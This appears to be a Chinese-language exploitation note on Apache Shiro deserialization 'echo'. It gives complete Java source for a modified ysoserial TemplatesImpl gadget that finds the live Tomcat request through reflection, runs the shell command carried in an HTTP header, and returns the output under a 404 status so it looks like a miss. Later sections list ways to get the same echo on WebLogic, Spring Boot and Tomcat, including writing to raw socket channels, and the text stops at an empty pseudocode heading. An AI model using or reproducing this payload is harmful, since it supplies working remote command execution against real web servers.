
shiro回显

修改 Gadgets.java(ysoserial 中负责生成 TemplatesImpl 载荷的文件)中的内容:

  1. 将 StubTransletPayload.class 替换为下面的 Tomback.class
  2. 修改 createTemplatesImpl(final String cmd)(注意:修改后 cmd 参数不再使用,要执行的命令在运行时由 Tomback 从请求头 ca 中读取)
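public static class Tomback extends AbstractTranslet {

    /**
     * Reads the declared field {@code s} of {@code o}'s runtime class, bypassing
     * access checks.  Only the runtime class itself is searched (not its
     * superclasses), which is why callers fall back to a specific class when the
     * field lives further up the hierarchy.
     *
     * @param o object to read from
     * @param s field name
     * @return the field's current value
     * @throws Exception if the field is not declared on the runtime class or cannot be read
     */
    public Object getO(Object o, String s) throws Exception {
        Field f = o.getClass().getDeclaredField(s);
        f.setAccessible(true);
        return f.get(o);
    }

    /**
     * Echo payload.  Runs when TemplatesImpl instantiates this translet: it walks the
     * current thread group for a Tomcat HTTP endpoint thread, follows it by
     * reflection to the connection handler's global request-group info, and for the
     * first in-flight request carrying a non-empty {@code ca} header executes that
     * header as a shell command and writes the output straight into that request's
     * response.
     *
     * @throws Exception if the thread group cannot be inspected or the response cannot be written
     */
    public Tomback() throws Exception {
        // NOTE(review): relies on ThreadGroup's private "threads" array; newer JDKs
        // have reworked ThreadGroup internals — confirm against the target JVM.
        Thread[] threads = (Thread[]) getO(Thread.currentThread().getThreadGroup(), "threads");
        for (Thread t : threads) {
            // The backing array is over-allocated, so unused tail slots are null.
            if (t == null) {
                continue;
            }
            // Keep connector threads (named after the connector, e.g. "http-...")
            // but skip the worker threads ("...-exec-N"), whose target is not an
            // endpoint inner class.
            String name = t.getName();
            if (name.contains("exec") || !name.contains("http")) {
                continue;
            }
            Object global;
            try {
                global = findGlobalRequestInfo(t);
            } catch (Exception e) {
                // A thread whose target does not have the expected shape (e.g. an
                // Acceptor from a different Tomcat version) must not abort the scan.
                continue;
            }
            for (Object p : (ArrayList<?>) getO(global, "processors")) {
                Object req = getO(p, "req");
                String cmd = (String) req.getClass()
                        .getMethod("getHeader", String.class).invoke(req, "ca");
                // getHeader() returns null when the header is absent; testing
                // isEmpty() alone would NPE on every request that lacks it.
                if (cmd == null || cmd.isEmpty()) {
                    continue;
                }
                byte[] out = runCommand(cmd);
                ByteChunk bc = new ByteChunk();
                bc.setBytes(out, 0, out.length);
                Object resp = req.getClass().getMethod("getResponse").invoke(req);
                // 404 presumably so the echo looks like an ordinary miss to anyone watching.
                resp.getClass().getMethod("setStatus", int.class).invoke(resp, 404);
                resp.getClass().getMethod("doWrite", ByteChunk.class).invoke(resp, bc);
                break;
            }
            // Only the first usable endpoint thread is consulted.
            break;
        }
    }

    /**
     * Follows an endpoint thread to its connection handler's global
     * {@code RequestGroupInfo}, trying the field/method layouts of the Tomcat
     * versions noted inline.
     *
     * @param t a Tomcat connector thread
     * @return the handler's global request-group info object
     * @throws Exception if the thread's target does not match any known layout
     */
    private Object findGlobalRequestInfo(Thread t) throws Exception {
        Object handler;
        try {
            // Thread target is an endpoint inner class; "handler" is declared on its
            // outer instance.
            handler = getO(getO(getO(t, "target"), "this$0"), "handler");
        } catch (Exception e) {
            // tomcat 8.5.* ~ : "handler" is declared on AbstractEndpoint, which getO()
            // cannot see because it only searches the runtime class.
            Object endpoint = getO(getO(t, "target"), "this$0");
            Field f = AbstractEndpoint.class.getDeclaredField("handler");
            f.setAccessible(true);
            handler = f.get(endpoint);
        }
        try {
            // tomcat 6.*
            return getO(handler, "global");
        } catch (Exception e) {
            // tomcat7.*-8.0.*
            return handler.getClass().getSuperclass().getDeclaredMethod("getGlobal").invoke(handler);
        }
    }

    /**
     * Runs {@code s} through the platform shell and returns everything it printed,
     * as raw bytes (no charset round-trip, so non-ASCII output survives unchanged).
     *
     * @param s command line taken from the request header
     * @return combined stdout/stderr of the command; empty array if it printed nothing
     * @throws Exception if the process cannot be started or read
     */
    private static byte[] runCommand(String s) throws Exception {
        // Locale.ROOT: in some locales toLowerCase() would not produce "window".
        String[] cmd = System.getProperty("os.name").toLowerCase(java.util.Locale.ROOT).contains("window")
                ? new String[] {"cmd.exe", "/c", s}
                : new String[] {"/bin/sh", "-c", s};
        // stderr is merged so a chatty command cannot block on an undrained pipe,
        // and its output is echoed too instead of being silently dropped.
        Process proc = new ProcessBuilder(cmd).redirectErrorStream(true).start();
        java.io.ByteArrayOutputStream buf = new java.io.ByteArrayOutputStream();
        java.io.InputStream in = proc.getInputStream();
        try {
            byte[] chunk = new byte[4096];
            int n;
            while ((n = in.read(chunk)) != -1) {
                buf.write(chunk, 0, n);
            }
        } finally {
            in.close();
        }
        return buf.toByteArray();
    }

    /** No-op: the payload does all its work in the constructor. */
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}

    /** No-op: the payload does all its work in the constructor. */
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}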


public static Object createTemplatesImpl(final String cmd) throws Exception {
    // Pull the already-compiled Tomback class through javassist so its raw bytecode
    // can be planted in a TemplatesImpl; when that object is later used on the
    // target it defines and instantiates the class from _bytecodes, which is what
    // runs Tomback's constructor.
    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
    pool.insertClassPath(new ClassClassPath(Tomback.class));
    CtClass translet = pool.get(Tomback.class.getName());
    translet.setSuperclass(pool.get(AbstractTranslet.class.getName()));
    byte[] bytecode = translet.toBytecode();

    // `cmd` is deliberately unused: Tomback reads the command from the request's
    // "ca" header at runtime, so nothing is baked into the class.
    TemplatesImpl templates = TemplatesImpl.class.newInstance();
    setTemplatesField(templates, "_bytecodes", new byte[][] { bytecode });
    // _name only needs to be non-null for TemplatesImpl to build the translet.
    setTemplatesField(templates, "_name", "a");
    // Also writes Tomback.class into the working directory (presumably for inspection).
    translet.writeFile();
    return templates;
}

/**
 * Sets a private TemplatesImpl field reflectively.
 *
 * @param target the TemplatesImpl to modify
 * @param field  declared field name on TemplatesImpl
 * @param value  new value
 * @throws Exception if the field does not exist or cannot be set
 */
private static void setTemplatesField(TemplatesImpl target, String field, Object value) throws Exception {
    Field f = TemplatesImpl.class.getDeclaredField(field);
    f.setAccessible(true);
    f.set(target, value);
}

效果

reference:https://xz.aliyun.com/t/6227


中间件context回显方式

# Weblogic回显
1. Thread -> getCurrentWork -> context
2. Thread -> getCurrentWork -> connectionHandler -> context
# Spring Boot回显
1. org.springframework.web.context.request.RequestContextHolder
2. org.springframework.webflow.context.ExternalContextHolder(属于 Spring Web Flow,仅在应用引入了 spring-webflow 时才存在)
# tomcat回显
1. Linux平台下,利用文件描述符回显

reference:00theway

回显研究

1.Get tomcat Channel

从 Thread.currentThread() 出发,可以找到一条从当前线程通向底层文件描述符(fd)的引用路径:

Thread-->target-->selector[SelectorImpl]-->fdMap-->key-value-->SocketChannel

[SelectorImpl 在不同平台上有不同实现:EPollSelectorImpl(Linux)、WindowsSelectorImpl(Windows)、KQueueSelectorImpl(macOS)]

通过这种方式可以跨平台地向 SocketChannel 写入数据,达到回显的效果。
缺点:fdMap 中保存的是该 Selector 管理的全部连接,无法判断哪一个属于当前请求,因此输出会被写到所有 HTTP 连接上——其他客户端也会收到这段数据,既会破坏它们的响应,也更容易被察觉。

伪代码:
